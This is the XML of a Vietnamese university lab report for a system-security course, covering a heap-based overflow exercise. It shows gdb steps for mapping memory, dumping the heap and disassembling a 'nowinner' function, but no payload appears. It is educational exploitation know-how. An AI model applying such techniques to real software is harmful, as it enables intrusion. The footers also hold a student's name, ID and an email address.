      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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>In ra thông tin bộ nhớ heap: (gdb)info proc map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439EFAB" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:right="2209"/>
        <w:jc w:val="right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Ghi lại địa chỉ bắt đầu của Heap </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Chụp hình minh hoạ) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x555555559000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC35E2" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="337" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="816" w:right="-719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0D3BF" wp14:editId="6DF98F2D">
            <wp:extent cx="6005195" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="642758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F2DF" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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>Tiếp tục thực hiện in nội dung của bộ nhớ heap &gt;700byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C131B2" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="828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(gdb)x/300x </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x555555559000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D32FFE1" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidSect="00AF301F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2240" w:h="15840"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1701" w:left="1134" w:header="4" w:footer="143" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FC1B03" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="338" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="358" w:right="-359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9196EB" wp14:editId="78D712CF">
            <wp:extent cx="5942965" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19550739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F696" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="5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Địa chỉ bắt đầu của hàm nowinner: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(gdb)disass nowinner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E8512" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="358" w:right="-359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46947" wp14:editId="32EE3E41">
            <wp:extent cx="5942965" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1327939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06AA" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.  Khai thác Heap-based overflow trong môi trường gdb. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343FB87" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="338" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4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194576" wp14:editId="05268CA5">
            <wp:extent cx="5942965" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1146530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1EF7" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE03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87A90C" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="000000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B4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>---HẾT---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6CF77E" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305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25F7737" w14:textId="5E93B37A" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305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6D35AD" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305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5619B0" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305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AE0305" w:rsidRPr="00BB4DA8" w:rsidSect="00AF301F">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1134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BFB4" w14:textId="77777777" w:rsidR="00AF301F" w:rsidRDefault="00AF301F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6464A446" w14:textId="77777777" w:rsidR="00AF301F" w:rsidRDefault="00AF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565520E-29DE-4841-8820-51265AF37782}"/>
    <w:embedBold r:id="rId2" w:fontKey="{C660C1F5-9646-4BE9-B1BC-3C529A0AB48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7BDB04F-02C2-4887-8C62-6E4FF2896F55}"/>
    <w:embedItalic r:id="rId4" w:fontKey="{13C0DFD2-E05A-4CC9-A037-8C7FDBFA39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366EF7A-958E-4EA2-B5D2-4208756ECA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sine">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId6" w:fontKey="{8B0BBE93-2EB0-4889-BE45-73161A56FE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56E8" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9457"/>
      </w:tabs>
      <w:spacing w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      </w:rPr>
      <w:t>SVTH: NGUYỄN HOÀNG LINH</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B92999" wp14:editId="687DCAFD">
          <wp:extent cx="3810000" cy="364238"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="766314135" name="Picture 7663141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0" cy="364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ab/>
      <w:t>MSSV: DI22V7X027</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2432E903" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="184"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="4C4C4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Downloaded by Tính Nguy?n (ntt9891@gmail.co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9F84" w14:textId="4B9E1F9B" w:rsidR="00BB4DA8" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8" w:rsidP="00BB4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6B25" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9457"/>
      </w:tabs>
      <w:spacing w:after="324" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      </w:rPr>
      <w:t>SVTH: NGUYỄN HOÀNG LINH</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      </w:rPr>
      <w:tab/>
      <w:t>MSSV: DI22V7X027</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="45BF208A" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="184"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="4C4C4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Downloaded by Tính Nguy?n (ntt9891@gmail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1485" w14:textId="77777777" w:rsidR="00AF301F" w:rsidRDefault="00AF301F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0819BD56" w14:textId="77777777" w:rsidR="00AF301F" w:rsidRDefault="00AF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A2CB" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRDefault="00AE0305">
    <w:pPr>
      <w:ind w:left="100"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="7CAB3277" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRDefault="00000000">
    <w:pPr>
      <w:ind w:left="100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An toàn hệ thống - Khoa CNTT&amp;TT </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4EBBEE93" w14:textId="77777777" w:rsidR="00AE03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725F46ED" wp14:editId="182E4297">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-63499</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>63500</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="615696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67520" y="3780000"/>
                        <a:ext cx="615696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4EA16F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5pt;margin-top:5pt;width:484.8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" filled="t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99CB" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="9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EF038F" wp14:editId="41BD46FD">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>914400</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>151765</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5943600" cy="581025"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="20717" name="Group 20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81025"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5943600" cy="581025"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:nvPicPr>
                        <pic:cNvPr id="20718" name="Picture 207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3875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19" name="Picture 207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3875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720" name="Shape 20720"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="489585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1905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29718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21" name="Rectangle 20721"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="58351" y="309778"/>
                          <a:ext cx="5415663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039D3F" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8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n toàn hệ thống (CT222) - Trường CNTT&amp;TT - Đại học Cần Th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EF038F" id="Group 20717" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:11.95pt;width:468pt;height:45.75pt;z-index:251659264;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="59436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718" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:52387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">
                <v:imagedata r:id="rId2" o:title=""/>
              </v:shape>
              <v:shape id="Picture 20719" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:52387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">
                <v:imagedata r:id="rId2" o:title=""/>
              </v:shape>
              <v:shape id="Shape 20720" o:spid="_x0000_s1029" style="position:absolute;top:4895;width:59436;height:191;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5943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" path="m,l5943600,r,19050l2971800,19050,,19050,,xe" fillcolor="#a0a0a0" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,5943600,19050"/>
              </v:shape>
              <v:rect id="Rectangle 20721" o:spid="_x0000_s1030" style="position:absolute;left:583;top:3097;width:5415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Sa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yN4gE874QrIOcPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAELORJrHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="19039D3F" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8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</w:rPr>
                        <w:t>An toàn hệ thống (CT222) - Trường CNTT&amp;TT - Đại học Cần Thơ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00000"/>
        <w:sz w:val="2"/>
      </w:rPr>
      <w:t>lOMoARcPSD|33610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8FD0" w14:textId="372C2F69" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="95"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="2"/>
      </w:rPr>
      <w:t>lOMoARcPSD|3361000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BBE5" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8">
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="9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E14824" wp14:editId="29996D10">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>914400</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>151765</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5943600" cy="581025"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="20673" name="Group 20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81025"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5943600" cy="581025"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:nvPicPr>
                        <pic:cNvPr id="20674" name="Picture 206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3875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75" name="Picture 206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3875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676" name="Shape 20676"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="489585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1905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29718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7" name="Rectangle 20677"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="58351" y="309778"/>
                          <a:ext cx="5415663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FBBED" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8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n toàn hệ thống (CT222) - Trường CNTT&amp;TT - Đại học Cần Th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E14824" id="Group 20673" o:spid="_x0000_s1031" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:11.95pt;width:468pt;height:45.75pt;z-index:251662336;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="59436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674" o:spid="_x0000_s1032" type="#_x0000_t75" style="position:absolute;left:52387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">
                <v:imagedata r:id="rId2" o:title=""/>
              </v:shape>
              <v:shape id="Picture 20675" o:spid="_x0000_s1033" type="#_x0000_t75" style="position:absolute;left:52387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">
                <v:imagedata r:id="rId2" o:title=""/>
              </v:shape>
              <v:shape id="Shape 20676" o:spid="_x0000_s1034" style="position:absolute;top:4895;width:59436;height:191;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5943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" path="m,l5943600,r,19050l2971800,19050,,19050,,xe" fillcolor="#a0a0a0" stroked="f" strokeweight="0">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,5943600,19050"/>
              </v:shape>
              <v:rect id="Rectangle 20677" o:spid="_x0000_s1035" style="position:absolute;left:583;top:3097;width:5415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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="60EFBBED" w14:textId="77777777" w:rsidR="00BB4DA8" w:rsidRDefault="00BB4DA8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</w:rPr>
                        <w:t>An toàn hệ thống (CT222) - Trường CNTT&amp;TT - Đại học Cần Thơ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00000"/>
        <w:sz w:val="2"/>
      </w:rPr>
      <w:t>lOMoARcPSD|3361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FFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BA47852"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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6AF5F64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8078FD06"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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92F5038"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8ECA788E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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20" w:hanging="16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40" w:hanging="23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60" w:hanging="30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80" w:hanging="37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00" w:hanging="45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20" w:hanging="52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40" w:hanging="59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60" w:hanging="66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97553A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D8099F0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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1E026DDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BDA052A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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09" w:hanging="12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29" w:hanging="19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49" w:hanging="26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69" w:hanging="33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89" w:hanging="40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09" w:hanging="48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29" w:hanging="55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49" w:hanging="62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13D4FC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="768659F8"/>
    <w:lvl w:ilvl="0" w:tplc="0590BD0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86CF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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6C8B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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804DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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E59FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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C572E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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C4639E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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CB262">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o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A9930">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪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D0C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFA034F4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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31AE175C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0D8DD40"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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0" w:hanging="12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0" w:hanging="19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0" w:hanging="27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0" w:hanging="34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0" w:hanging="41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0" w:hanging="48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0" w:hanging="55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0" w:hanging="63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3A1216A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="891673F6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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475001EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A288A2B0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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4AB82D53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="144C17C8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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55991BB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6AC578A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-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09" w:hanging="12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29" w:hanging="19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49" w:hanging="26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69" w:hanging="33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89" w:hanging="40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09" w:hanging="48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29" w:hanging="55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49" w:hanging="62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314919035">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="749230286">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1153375307">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1741636390">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="190185949">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1096901619">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1645815020">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="570893385">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1396925973">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2108379684">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="444427301">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1140344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305"/>
    <w:rsid w:val="0003482E"/>
    <w:rsid w:val="004D1E38"/>
    <w:rsid w:val="005112F2"/>
    <w:rsid w:val="0088200F"/>
    <w:rsid w:val="00992DD4"/>
    <w:rsid w:val="00AE0305"/>
    <w:rsid w:val="00AF301F"/>
    <w:rsid w:val="00BB4DA8"/>
    <w:rsid w:val="00C15F72"/>
    <w:rsid w:val="00C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CD26"/>
  <w15:docId w15:val="{BBE64285-0C34-4E98-95C3-90C70C28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E38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BB4DA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4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DA8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB4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DA8"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D1E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g"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3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https://samsclass.info/127/proj/ED3a.c" TargetMode="External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oter" Target="footer1.xml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g"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/@TinhNguyenThien-dp8iq/featured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eader" Target="header3.xml"/><Relationship Id="rId67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image" Target="media/image31.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpg"/><Relationship Id="rId6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C439-D60E-4950-9679-6CEFE2DA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ính nguyễn</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-25T09:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-25T10:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>